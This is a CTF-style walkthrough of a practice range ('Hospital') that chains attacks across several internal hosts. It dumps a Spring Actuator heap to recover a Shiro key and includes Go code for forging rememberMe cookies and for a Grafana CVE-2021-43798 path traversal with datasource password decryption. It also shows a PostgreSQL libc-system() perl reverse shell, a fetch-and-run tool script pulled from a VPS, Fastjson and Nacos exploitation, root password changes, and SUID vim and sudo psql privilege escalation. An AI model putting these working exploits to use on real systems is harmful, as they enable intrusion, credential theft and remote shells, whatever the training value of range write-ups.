春秋云镜-Hospital

Hospital

flag1

Information gathering

poc-yaml-spring-actuator-heapdump-file

Spring Boot application with a heapdump leak through a misconfigured Actuator. The dump itself shows the cause: the OriginTrackedMapPropertySource section below contains management.endpoints.web.exposure.include = *, which exposes every Actuator endpoint (heapdump, env, mappings and the rest) over HTTP without authentication, where Spring Boot 2 would by default expose only health and info.

Reference: Springboot之actuator配置不当的漏洞利用 (exploiting a misconfigured Spring Boot Actuator)

Request /actuator/heapdump to download the heap dump. It is a full HPROF snapshot of the JVM heap, so whatever was in memory at that moment (Shiro keys, datasource passwords, session tokens) can be recovered from it.

Parse it with JDumpSpider-1.1-SNAPSHOT-full.jar:

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump > 1.txt

Contents of 1.txt:

===========================================
SpringDataSourceProperties
-------------
not found!

===========================================
WeblogicDataSourceConnectionPoolConfig
-------------
not found!

===========================================
MongoClient
-------------
not found!

===========================================
AliDruidDataSourceWrapper
-------------
not found!

===========================================
HikariDataSource
-------------
not found!

===========================================
RedisStandaloneConfiguration
-------------
not found!

===========================================
JedisClient
-------------
not found!

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

===========================================
OriginTrackedMapPropertySource
-------------
management.endpoints.web.exposure.include = *
server.port = 8080
spring.thymeleaf.prefix = classpath:/templates/

===========================================
MutablePropertySources
-------------
awt.toolkit = sun.awt.X11.XToolkit
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
java.class.path = /app/login-1.0-SNAPSHOT.jar
path.separator = :
java.vm.vendor = Private Build
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
file.encoding = UTF-8
catalina.useNaming = false
spring.beaninfo.ignore = true
java.vm.specification.version = 1.8
os.name = Linux
java.vm.name = OpenJDK 64-Bit Server VM
local.server.port = null
user.country = US
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
sun.java.command = /app/login-1.0-SNAPSHOT.jar
java.io.tmpdir = /tmp
catalina.home = /tmp/tomcat.1038200716715894093.8080
java.version = 1.8.0_392
user.home = /home/app
user.language = en
PID = 757
java.awt.printerjob = sun.print.PSPrinterJob
file.separator = /
catalina.base = /tmp/tomcat.1038200716715894093.8080
java.vm.info = mixed mode
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext

===========================================
MapPropertySources
-------------
local.server.port = null

===========================================
ConsulPropertySources
-------------
not found!

===========================================
JavaProperties
-------------
java.util.logging.FileHandler.pattern = %h/java%u.log
awt.toolkit = sun.awt.X11.XToolkit
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
sun.arch.data.model = 64
catalina.useNaming = false
security.overridePropertiesFile = true
security.provider.7 = com.sun.security.sasl.Provider
sun.boot.library.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64
sun.java.command = /app/login-1.0-SNAPSHOT.jar
security.provider.9 = sun.security.smartcardio.SunPCSC
java.specification.vendor = Oracle Corporation
security.provider.1 = sun.security.provider.Sun
security.provider.2 = sun.security.rsa.SunRsaSign
security.provider.3 = sun.security.ec.SunEC
networkaddress.cache.negative.ttl = 10
security.provider.4 = com.sun.net.ssl.internal.ssl.Provider
security.provider.5 = com.sun.crypto.provider.SunJCE
security.provider.6 = sun.security.jgss.SunProvider
file.separator = /
org.springframework.web.servlet.HandlerExceptionResolver = org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver,org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver,org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
org.springframework.web.servlet.HandlerMapping = org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping,org.springframework.web.servlet.function.support.RouterFunctionMapping
org.springframework.web.servlet.HandlerAdapter = org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter,org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter,org.springframework.web.servlet.function.support.HandlerFunctionAdapter
org.springframework.web.servlet.FlashMapManager = org.springframework.web.servlet.support.SessionFlashMapManager
package.definition = sun.,com.sun.xml.internal.,com.sun.imageio.,com.sun.istack.internal.,com.sun.jmx.,com.sun.media.sound.,com.sun.naming.internal.,com.sun.proxy.,com.sun.corba.se.,com.sun.org.apache.bcel.internal.,com.sun.org.apache.regexp.internal.,com.sun.org.apache.xerces.internal.,com.sun.org.apache.xpath.internal.,com.sun.org.apache.xalan.internal.extensions.,com.sun.org.apache.xalan.internal.lib.,com.sun.org.apache.xalan.internal.res.,com.sun.org.apache.xalan.internal.templates.,com.sun.org.apache.xalan.internal.utils.,com.sun.org.apache.xalan.internal.xslt.,com.sun.org.apache.xalan.internal.xsltc.cmdline.,com.sun.org.apache.xalan.internal.xsltc.compiler.,com.sun.org.apache.xalan.internal.xsltc.trax.,com.sun.org.apache.xalan.internal.xsltc.util.,com.sun.org.apache.xml.internal.res.,com.sun.org.apache.xml.internal.resolver.helpers.,com.sun.org.apache.xml.internal.resolver.readers.,com.sun.org.apache.xml.internal.security.,com.sun.org.apache.xml.internal.serializer.utils.,com.sun.org.apache.xml.internal.utils.,com.sun.org.glassfish.,com.oracle.xmlns.internal.,com.oracle.webservices.internal.,oracle.jrockit.jfr.,org.jcp.xml.dsig.internal.,jdk.internal.,jdk.nashorn.internal.,jdk.nashorn.tools.,jdk.xml.internal.,com.sun.activation.registries.,jdk.jfr.events.,jdk.jfr.internal.,jdk.management.jfr.internal.
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
org.springframework.web.servlet.ThemeResolver = org.springframework.web.servlet.theme.FixedThemeResolver
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
user.name = app
policy.url.1 = file:${java.home}/lib/security/java.policy
securerandom.source = file:/dev/random
policy.url.2 = file:${user.home}/.java.policy
jdk.tls.disabledAlgorithms = SSLv3, TLSv1, TLSv1.1, RC4, DES, MD5withRSA, DH keySize < 1024, EC keySize < 224, 3DES_EDE_CBC, anon, NULL, include jdk.disabled.namedCurves
policy.ignoreIdentityScope = false
file.encoding = UTF-8
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
jdk.sasl.disabledMechanisms =
java.io.tmpdir = /tmp
org.springframework.web.servlet.ViewResolver = org.springframework.web.servlet.view.InternalResourceViewResolver
java.version = 1.8.0_392
jdk.tls.keyLimits = AES/GCM/NoPadding KeyUpdate 2^37
java.vm.specification.name = Java Virtual Machine Specification
PID = 757
java.awt.printerjob = sun.print.PSPrinterJob
jdk.xml.dsig.secureValidationPolicy = disallowAlg http://www.w3.org/TR/1999/REC-xslt-19991116,disallowAlg http://www.w3.org/2001/04/xmldsig-more#rsa-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#hmac-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#md5,maxTransforms 5,maxReferences 30,disallowReferenceUriSchemes file http https,minKeySize RSA 1024,minKeySize DSA 1024,minKeySize EC 224,noDuplicateIds,noRetrievalMethodLoops
java.library.path = /usr/java/packages/lib/amd64:/usr/lib/x86_64-linux-gnu/jni:/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu:/usr/lib/jni:/lib:/usr/lib
java.vendor = Private Build
handlers = java.util.logging.ConsoleHandler
java.specification.maintenance.version = 5
sun.io.unicode.encoding = UnicodeLittle
krb5.kdc.bad.policy = tryLast
java.class.path = /app/login-1.0-SNAPSHOT.jar
jdk.security.legacyAlgorithms = SHA1, RSA keySize < 2048, DSA keySize < 2048
java.vm.vendor = Private Build
jdk.disabled.namedCurves = secp112r1, secp112r2, secp128r1, secp128r2, secp160k1, secp160r1, secp160r2, secp192k1, secp192r1, secp224k1, secp224r1, secp256k1, sect113r1, sect113r2, sect131r1, sect131r2, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1, X9.62 c2tnb191v1, X9.62 c2tnb191v2, X9.62 c2tnb191v3, X9.62 c2tnb239v1, X9.62 c2tnb239v2, X9.62 c2tnb239v3, X9.62 c2tnb359v1, X9.62 c2tnb431r1, X9.62 prime192v2, X9.62 prime192v3, X9.62 prime239v1, X9.62 prime239v2, X9.62 prime239v3, brainpoolP256r1, brainpoolP320r1, brainpoolP384r1, brainpoolP512r1
crypto.policy = unlimited
jceks.key.serialFilter = java.lang.Enum;java.security.KeyRep;java.security.KeyRep$Type;javax.crypto.spec.SecretKeySpec;!*
login.configuration.provider = sun.security.provider.ConfigFile
user.timezone =
java.vm.specification.version = 1.8
os.name = Linux
user.country = US
jdk.security.caDistrustPolicies = SYMANTEC_TLS
sun.cpu.endian = little
user.home = /home/app
user.language = en
en = UTF-8
jdk.tls.alpnCharset = ISO_8859_1
ssl.KeyManagerFactory.algorithm = SunX509
.level = INFO
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
com.xyz.foo.level = SEVERE
policy.provider = sun.security.provider.PolicyFile
path.separator = :
fr = UTF-8
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
keystore.type.compat = true
org.springframework.web.servlet.RequestToViewNameTranslator = org.springframework.web.servlet.view.DefaultRequestToViewNameTranslator
spring.beaninfo.ignore = true
java.vm.name = OpenJDK 64-Bit Server VM
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
java.util.logging.FileHandler.formatter = java.util.logging.XMLFormatter
java.util.logging.FileHandler.count = 1
catalina.home = /tmp/tomcat.1038200716715894093.8080
sun.cds.enableSharedLookupCache = false
sun.security.krb5.maxReferrals = 5
catalina.base = /tmp/tomcat.1038200716715894093.8080
java.util.logging.FileHandler.limit = 50000
java.vm.info = mixed mode
keystore.type = jks
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext
policy.expandProperties = true
securerandom.strongAlgorithms = NativePRNGBlocking:SUN

===========================================
ProcessEnvironment
-------------
not found!

===========================================
OSS
-------------
not found!

===========================================
UserPassSearcher
-------------
org.apache.shiro.web.filter.authc.FormAuthenticationFilter:
[failureKeyAttribute = shiroLoginFailure, loginUrl = /login, successUrl = /, usernameParam = username, passwordParam = password]

org.apache.catalina.startup.Tomcat:
[hostname = localhost]


===========================================
CookieThief
-------------
not found!

===========================================
AuthThief
-------------
not found!

===========================================

External foothold

Found the Shiro key

CookieRememberMeManager(ShiroKey)

algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES
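Added example, not part of the original write-up and not Shiro's own code: a Go reproduction of how the rememberMe cookie is built from this key and of the offline key check that Shiro tooling performs on a captured cookie. It assumes Shiro's default AesCipherService layout (AES/CBC/PKCS5Padding, a random 16-byte IV prepended, then base64) and uses a constructed byte string in place of a real serialized PrincipalCollection or gadget chain; the leaked key is the one printed above, the other candidate is Shiro's historical hard-coded default.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
)

// LeakedKey is the CookieRememberMeManager key from the heap dump (base64 of 16 raw bytes).
const LeakedKey = "GAYysgMQhG7/CzIJlVpR2g=="

// DefaultShiroKey is Shiro's old hard-coded default, the first entry of every key list.
const DefaultShiroKey = "kPH+bIxk5D2deZiIxcaaaA=="

// Java serialization streams start with this magic; Shiro serializes the principal
// (or, when forged, a gadget chain) before encrypting, so the right key exposes it.
var javaSerialMagic = []byte{0xac, 0xed, 0x00, 0x05}

// SamplePayload is a constructed stand-in for the serialized object; only the magic matters here.
func SamplePayload() []byte {
	return append(append([]byte{}, javaSerialMagic...), "constructed principal bytes"...)
}

func pkcs7Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte, size int) ([]byte, error) {
	if len(b) == 0 || len(b)%size != 0 {
		return nil, errors.New("bad length")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > size {
		return nil, errors.New("bad padding")
	}
	for _, v := range b[len(b)-n:] {
		if int(v) != n {
			return nil, errors.New("bad padding")
		}
	}
	return b[:len(b)-n], nil
}

// EncryptRememberMe mirrors Shiro's AesCipherService (AES/CBC/PKCS5Padding, random
// 16-byte IV prepended, base64). A forged cookie is built exactly this way.
func EncryptRememberMe(key, plaintext []byte) (string, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return "", err
	}
	padded := pkcs7Pad(append([]byte{}, plaintext...), aes.BlockSize)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(append(iv, ct...)), nil
}

// DecryptRememberMe reverses it; a padding error almost always means a wrong key.
func DecryptRememberMe(key []byte, cookie string) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(cookie)
	if err != nil {
		return nil, err
	}
	if len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, errors.New("cookie is not IV plus whole blocks")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, raw[:aes.BlockSize]).CryptBlocks(pt, raw[aes.BlockSize:])
	return pkcs7Unpad(pt, aes.BlockSize)
}

// FindKey is the offline key check: try each candidate on a captured rememberMe cookie
// and accept the one that yields valid padding plus the serialization magic.
func FindKey(cookie string, candidates []string) (string, bool) {
	for _, c := range candidates {
		key, err := base64.StdEncoding.DecodeString(c)
		if err != nil {
			continue
		}
		if pt, err := DecryptRememberMe(key, cookie); err == nil && bytes.HasPrefix(pt, javaSerialMagic) {
			return c, true
		}
	}
	return "", false
}

func main() {
	key, _ := base64.StdEncoding.DecodeString(LeakedKey)
	cookie, _ := EncryptRememberMe(key, SamplePayload())
	fmt.Println("rememberMe=" + cookie)
	found, ok := FindKey(cookie, []string{DefaultShiroKey, LeakedKey})
	fmt.Println("key identified:", found, ok)
}
```

The same check runs against a real cookie: log in once with "remember me" ticked, copy the rememberMe value, and feed it to FindKey with a key list; a hit confirms the key before any gadget chain is sent, and a miss on the default key (as here) is exactly why the heap dump mattered.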

With the key known, a rememberMe cookie carrying a deserialization gadget chain can be forged (the classic Shiro-550 path), which is how the shell on web1 is obtained.

New reverse shell tool: pwncat-cs

Found /usr/bin/vim.basic usable for privilege escalation (the -p flag below keeps the elevated effective UID, i.e. this is the SUID case):

# vim.basic's embedded python3 execs bash -p, which preserves the SUID-elevated effective UID
vim.basic -c ':python3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'

flag2

A few small notes on post-exploitation uploads (only really useful on a practice range)

Upload fscan and frp with pwncat

PS: this tool's upload corrupts files (angry.jpg). Compare sha256sum on both ends after any upload before trusting a binary.

# Three commands is still a lot, but at least it is not fiddly; directories cannot be uploaded
# The emulated terminal is vastly nicer than a raw reverse shell
# CTRL+D returns to the pwncat prompt
upload /home/ubuntu/st/fscan /tmp/fscan
upload /home/ubuntu/st/frpc /tmp/frpc
upload /home/ubuntu/st/frpc.ini /tmp/frpc.ini

My own personal wget.sh?

# vps (http.server takes the port as a positional argument; there is no -p port flag)
python3 -m http.server port
# target shell
wget http://vps:port/wget.sh && chmod +x wget.sh && ./wget.sh
wget.sh:

#!/bin/bash
set -e

# URLs of the files to fetch
files=(
  "http://vpsip:port/frpc"
  "http://vpsip:port/frpc.ini"
  "http://vpsip:port/fscan"
)

# Download each one (set -e aborts the script on the first failed download)
for file in "${files[@]}"; do
  wget "$file"
done

echo "All files downloaded!"

# Make the downloaded files executable
for file in "${files[@]}"; do
  # File name from the URL
  filename=$(basename "$file")
  # +x is enough; 777 also makes the tools world-writable
  chmod 777 "$filename"
  # chmod +x "$filename"
done

echo "Execute permission granted on all files!"

Combining the two seems to work better?

Internal network information gathering

172.30.12.5  web1  Shiro  (already compromised)

172.30.12.6:8848  Nacos

172.30.12.236:8080  web3  Fastjson

Internal network foothold

172.30.12.6:8848

172.30.12.6:8848 on the internal network is Nacos,

which is vulnerable to the Nacos Derby SQL injection.

SnakeYaml deserialization would also work.

Connect with Behinder (冰蝎)

172.30.12.236:8080

172.30.12.236:8080 is exploited through Fastjson deserialization.

Fastjson plugin

12.236 has no outbound internet access, but fortunately 12.5 is already compromised.

Reverse the shell from 12.236 to 12.5.

Seems not to work?

Use the plugin to write a memory shell instead (the second one).

It runs as root, so change root's password here to make the next steps easier.

Change web3's root password:

# already root, so the sudo is redundant here
echo 'root:123456' | sudo chpasswd

Now web1 can SSH into it.

Dual NICs: web3 has a second interface on the 172.30.54.0/24 segment.

Upload fscan and scan it.

A two-layer proxy can be built here.

Then proxy 172.30.54.* through the 172.30.12 hop so the new segment can be reached through the proxy chain.

172.30.12.5 has python3, so start an HTTP server there and pull fscan and frp down onto .236.

Very slow.

Used Godzilla's (哥斯拉) built-in large-file upload instead.

172.30.54.179:22 open
172.30.54.179:8080 open
172.30.54.12:5432 open
172.30.54.12:22 open
172.30.54.12:3000 open
172.30.54.179:8009 open
[*] WebTitle http://172.30.54.12:3000 code:302 len:29 title:None redirect url: http://172.30.54.12:3000/login
[*] WebTitle http://172.30.54.179:8080 code:200 len:3964 title:医院后台管理平台
[*] WebTitle http://172.30.54.12:3000/login code:200 len:27909 title:Grafana

Multi-layer proxy

Tried setting up frp (failed)

frps.ini:
[common]
bind_port = 7000
frpc.ini:
[common]
server_addr = 172.30.54.179
server_port = 7000
tls_enable = true
pool_count = 5

[plugin_socks2]
type = tcp
remote_port = 46075
plugin = socks5
use_encryption = true
use_compression = true


Switched to Stowaway

Reference: https://fushuling.com/index.php/2023/09/21/%e5%86%85%e7%bd%91%e4%bb%a3%e7%90%86%e6%90%ad%e5%bb%ba/#/

172.30.54.12

Visiting it shows Grafana; exploit CVE-2021-43798 (unauthenticated path traversal through the plugin asset route) to read grafana.ini and grafana.db, from which the data source password is recovered.

Read the PostgreSQL password

https://github.com/A-D-Team/grafanaExp/releases

./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
2024/01/06 20:36:23 Target vulnerable has plugin [alertlist]
2024/01/06 20:36:23 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
2024/01/06 20:36:23 There is [0] records in db.
2024/01/06 20:36:24 type:[postgres] name:[PostgreSQL] url:[localhost:5432] user:[postgres] password[Postgres@123] database:[postgres] basic_auth_user:[] basic_auth_password:[]
2024/01/06 20:36:24 All Done, have nice day!

user:[postgres]

password[Postgres@123]

Note that SW2YcwTIb9zpOOhoPsMm is the secret_key shipped in Grafana's default configuration, so this instance never rotated it; with the traversal the attacker reads the key out of grafana.ini anyway, which is why the data source password falls out of grafana.db.
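Added example, in Go; this is my code, not the write-up's and not grafanaExp's. It shows what the tool does after the traversal read: build the CVE-2021-43798 path, extract secret_key from a grafana.ini body, and decrypt one data source secret. The storage layout (8-byte salt, 16-byte IV, AES-256-CFB, key derived with PBKDF2-HMAC-SHA256 over 10000 iterations) is Grafana's legacy util.Encrypt format as I know it; treat it as an assumption to re-check against the Grafana source for the target version. The encrypted sample is constructed locally from the secret_key and password printed above, not taken from the target's grafana.db.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

const (
	saltLen    = 8     // Grafana prefixes each secret with an 8-byte salt
	pbkdf2Iter = 10000 // iterations in Grafana's encryptionKeyToBytes
	keyLen     = 32    // AES-256
)

// TraversalURL builds the CVE-2021-43798 read: the plugin asset route does not normalise "..",
// so any file is reachable below /public/plugins/<installed plugin>/. The client must send the
// path as-is (curl --path-as-is), otherwise it collapses the traversal before it leaves.
func TraversalURL(base, plugin, target string) string {
	return strings.TrimRight(base, "/") + "/public/plugins/" + plugin +
		"/../../../../../../../../" + strings.TrimLeft(target, "/")
}

// SecretKeyFromINI pulls secret_key out of the [security] section of a grafana.ini body.
func SecretKeyFromINI(ini string) (string, bool) {
	inSecurity := false
	for _, line := range strings.Split(ini, "\n") {
		line = strings.TrimSpace(line)
		if strings.HasPrefix(line, "[") {
			inSecurity = line == "[security]"
			continue
		}
		if k, v, ok := strings.Cut(line, "="); inSecurity && ok && strings.TrimSpace(k) == "secret_key" {
			return strings.TrimSpace(v), true
		}
	}
	return "", false
}

// pbkdf2SHA256 is RFC 8018 PBKDF2 with HMAC-SHA256, written out to stay on the standard library.
func pbkdf2SHA256(password, salt []byte, iter, outLen int) []byte {
	prf := hmac.New(sha256.New, password)
	var out []byte
	idx := make([]byte, 4)
	for block := uint32(1); len(out) < outLen; block++ {
		binary.BigEndian.PutUint32(idx, block)
		prf.Reset()
		prf.Write(salt)
		prf.Write(idx)
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:outLen]
}

// DecryptSecureJSON decrypts one base64 value from data_source.secure_json_data (or the legacy
// password column): salt || iv || AES-CFB ciphertext, key = PBKDF2(secret_key, salt).
func DecryptSecureJSON(secretKey, b64 string) (string, error) {
	payload, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(payload) < saltLen+aes.BlockSize {
		return "", errors.New("payload shorter than salt+iv")
	}
	block, err := aes.NewCipher(pbkdf2SHA256([]byte(secretKey), payload[:saltLen], pbkdf2Iter, keyLen))
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(payload)-saltLen-aes.BlockSize)
	cipher.NewCFBDecrypter(block, payload[saltLen:saltLen+aes.BlockSize]).XORKeyStream(pt, payload[saltLen+aes.BlockSize:])
	return string(pt), nil
}

// EncryptSecureJSON is the inverse, used only to construct a sample the way Grafana stores it.
func EncryptSecureJSON(secretKey, plaintext string) (string, error) {
	buf := make([]byte, saltLen+aes.BlockSize+len(plaintext))
	if _, err := rand.Read(buf[:saltLen+aes.BlockSize]); err != nil {
		return "", err
	}
	block, err := aes.NewCipher(pbkdf2SHA256([]byte(secretKey), buf[:saltLen], pbkdf2Iter, keyLen))
	if err != nil {
		return "", err
	}
	cipher.NewCFBEncrypter(block, buf[saltLen:saltLen+aes.BlockSize]).XORKeyStream(buf[saltLen+aes.BlockSize:], []byte(plaintext))
	return base64.StdEncoding.EncodeToString(buf), nil
}

func main() {
	// Constructed sample: the secret_key and password from the grafanaExp output, re-encrypted locally.
	const secret = "SW2YcwTIb9zpOOhoPsMm"
	fmt.Println(TraversalURL("http://172.30.54.12:3000", "alertlist", "/etc/grafana/grafana.ini"))
	enc, _ := EncryptSecureJSON(secret, "Postgres@123")
	dec, err := DecryptSecureJSON(secret, enc)
	fmt.Println("decrypted:", dec, err)
}
```

Reading grafana.db itself (an SQLite file) and pulling the base64 values out of the data_source table is the part grafanaExp handles; the decrypt step above is what turns those values into the plaintext password the tool printed.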

Change root's password; it is needed during privilege escalation, though things also work without it.

-- This alters the PostgreSQL role named root, not the OS account
ALTER USER root WITH PASSWORD '123456';

Use web1 to SSH into web3 and run the listener there; the Godzilla tool used earlier cannot do this.

Reverse shell via perl:

-- Requires superuser on the database: binds libc's system() as a SQL-callable C function
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;

-- Dollar quoting avoids escaping the single quotes inside the perl one-liner (with
-- standard_conforming_strings on, the \' form would terminate the literal early);
-- system() blocks until the command returns, so the query hangs for as long as the shell lives
SELECT system($cmd$perl -e 'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'$cmd$);

Privilege escalation

Upgrade to a proper TTY first:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Steps (the psql trick from GTFOBins): \? opens the help text in the pager, less, and ! is the pager's shell escape, so the bash it spawns inherits root from sudo.

sudo /usr/local/postgresql/bin/psql
\?
!/bin/bash